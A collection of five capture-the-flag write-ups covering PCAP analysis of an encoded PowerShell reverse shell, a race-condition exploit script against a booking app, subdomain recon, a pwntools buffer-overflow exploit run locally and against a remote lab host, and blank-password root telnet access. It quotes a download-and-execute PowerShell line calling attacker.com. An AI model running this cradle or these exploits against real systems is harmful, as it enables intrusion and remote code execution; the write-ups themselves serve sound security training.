Challenge Overview

This challenge involves analyzing a network packet capture (PCAP) file to identify and deobfuscate a PowerShell reverse shell. The goal is to extract the obfuscated command and decode it to reveal the flag.

Initial Analysis

First, I opened the PCAP file in Wireshark to examine the network traffic patterns.

wireshark capture.pcap

Key Observations:

• Multiple HTTP POST requests to a suspicious endpoint
• Base64-encoded strings in packet payloads
• PowerShell command execution patterns

Solution Steps

1. Filtering Relevant Traffic

Applied Wireshark filter to isolate PowerShell-related traffic:

http.request.method == "POST" && frame contains "powershell"

2. Extracting the Payload

Located the obfuscated PowerShell command in packet #247. The payload appeared as:

powershell -enc <base64_string>

3. Deobfuscation Process

Extracted the base64 string and decoded it:

import base64

encoded = "BASE64_STRING_HERE"
decoded = base64.b64decode(encoded)
print(decoded.decode('utf-16le'))

The decoded output revealed:

IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')

4. Further Analysis

Following the download URL in the PCAP, I found another base64-encoded payload that contained the final flag.

Flag

WWF{p0w3r5h3ll_0bf5c4t10n_m4573r3d}

Key Takeaways

• Always check for base64-encoded strings in network traffic
• PowerShell often uses -enc for encoded commands
• UTF-16LE encoding is common in PowerShell
• Follow the chain of downloads when analyzing staged payloads

Tools Used

• Wireshark
• Python3 (base64 module)
• CyberChef (for quick decoding verification)

Thanks for reading! If you have questions or alternative solutions, feel free to reach out.

Challenge Overview

A space shuttle booking system where only one seat remains. The objective: obtain two tickets under the same username to claim the boarding pass and retrieve the flag.

Files Provided

galacticshuttle/
├── app.py
├── Dockerfile
├── flag.txt
└── templates/
    └── index.html

Source Code Analysis

Global State

available_tickets = 1
purchases = {}

Booking Endpoint

@app.route('/acquire', methods=['GET'])
def acquire():
    global available_tickets
    user = request.args.get('user')
    ...
    if available_tickets < 1:
        return jsonify(status="sold_out")
    
    available_tickets -= 1
    ticket_id = uuid.uuid4().hex
    purchases.setdefault(user, []).append(ticket_id)
    return jsonify(status="ok", ticket=ticket_id)

Flag Retrieval Endpoint

@app.route('/flag', methods=['GET'])
def flag():
    user = request.args.get('user')
    if len(purchases.get(user, [])) > 1:
        return jsonify(flag=FLAG)
    return jsonify(status="not_enough_tickets")

Vulnerability: Race Condition

The server doesn’t lock the check/decrement logic for concurrent requests. Two simultaneous requests can both read available_tickets = 1 before either decrements it, allowing both to proceed — a classic TOCTOU race condition.

Exploitation

import threading
import requests

URL = "https://<challenge-instance>.chall.wwctf.com"
user = "Michael"

def book():
    r = requests.get(f"{URL}/acquire", params={"user": user})
    print(r.text)

threads = []
for _ in range(2):
    t = threading.Thread(target=book)
    t.start()
    threads.append(t)

for t in threads:
    t.join()

r = requests.get(f"{URL}/flag", params={"user": user})
print("FLAG RESPONSE:", r.text)

Output

{"status":"ok","ticket":"..."}
{"status":"ok","ticket":"..."}
FLAG RESPONSE: {"flag":"wwctf{r4c3_c0nd1t10ns_4r3_0ut_0f_th1s_w0rld}"}

Flag

wwctf{r4c3_c0nd1t10ns_4r3_0ut_0f_th1s_w0rld}

Key Takeaways

• Race conditions can bypass security logic even in simple applications
• Any check-then-act pattern on shared state without locking is potentially exploitable
• Two threads are often enough — timing matters more than volume

Challenge Overview

A reconnaissance task focused on the domain virelia-water.it.com. The goal: enumerate subdomains and uncover intelligence that reveals the flag.

Step 1: Subdomain Enumeration with Sublist3r

sublist3r -d virelia-water.it.com

Output:

[-] Total Unique Subdomains Found: 2
54484d7b5375357373737d.virelia-water.it.com
stage0.virelia-water.it.com

The first subdomain immediately stands out — it looks like hex rather than a normal hostname.

Step 2: Decode the Hex

Isolate the suspicious string and pipe it through xxd:

echo "54484d7b5375357373737d" | xxd -r -p

Output:

THM{Su5sss}

Flag

THM{Su5sss}

Key Takeaways

• Subdomain enumeration is one of the most effective passive recon techniques
• Hex-encoded strings in unexpected places (subdomains, DNS records) are worth investigating
• xxd -r -p is your quick decoder for hex strings in CTFs

Challenge Overview

A water control facility hit by malware three months ago. A persistent second-stage implant remains hidden in the OT environment. Objective: infiltrate the system and extract the flag before the attacker reactivates control.

“A stray input at the operator console is all it needs. Buffers break, execution slips, and control pivots.”

Step 1: Binary Analysis

wget http://10.10.229.193/Start/start.zip
unzip start.zip -d start_pwn
cd start_pwn
file start
checksec --file=start
nm -C start | grep ' T '

Security analysis results:

• 64-bit ELF executable
• NX (No eXecute) enabled
• No stack canary
• No PIE — allows hardcoded address exploitation
• Symbols not stripped

Step 2: Function Discovery

Key functions from symbol table:

0000000000401298  main
0000000000401216  print_flag

print_flag at 0x401216 is the target.

Step 3: Find the Offset

from pwn import *
print(cyclic(100))

Run the binary with the cyclic pattern, observe the crash offset. Result: 72 bytes before the return address.

Step 4: Local Exploit

echo 'THM{buffer_overflow_pwned}' > flag.txt

from pwn import *

p = process('./start')

offset = 72
print_flag_addr = 0x401216

payload = b"A" * offset + p64(print_flag_addr) + p64(0x0)

p.sendlineafter("Enter your username:", payload)
p.interactive()

Local flag retrieved successfully.

Step 5: Remote Recon

nmap -sV -p- 10.10.68.1

Service found on port 9008.

Step 6: Remote Exploit

from pwn import *

p = remote('10.10.68.1', 9008)

offset = 72
print_flag_addr = 0x401216

payload = b"A" * offset + p64(print_flag_addr) + p64(0x0)

p.sendlineafter("Enter your username:", payload)
p.interactive()

Flag

THM{nice_place_t0_st4rt}

Key Takeaways

• Always run checksec first — the absence of PIE and stack canaries tells you a lot
• No PIE means function addresses are static and usable directly in the payload
• Build and test locally before pointing at the remote target
• pwntools p64() handles little-endian packing automatically

Background

Returning to Hack The Box after a year away to join fr334aks-Mini — a team that requires members to solve CTF challenges and document their process. This is box one.

Step 1: Enumeration

sudo nmap -sV {target_ip}

Telnet is running on port 23 — an old protocol used for command-line remote access, rarely seen in production anymore but common in beginner HTB boxes.

Step 2: Connect via Telnet

telnet {target_ip}

Misconfigured services sometimes leave default accounts with blank passwords. Common usernames to try: admin, administrator, root.

Trying root with no password grants immediate access.

Step 3: Get the Flag

ls
cat flag.txt

Flag

{flag from machine}

Key Takeaways

• Telnet sends everything in plaintext — never use it on production systems
• Default/blank credentials are still a real attack vector
• Banner grabbing during enumeration can reveal service versions and misconfigurations
• Starting Point boxes are great for building muscle memory on the basics before moving to harder machines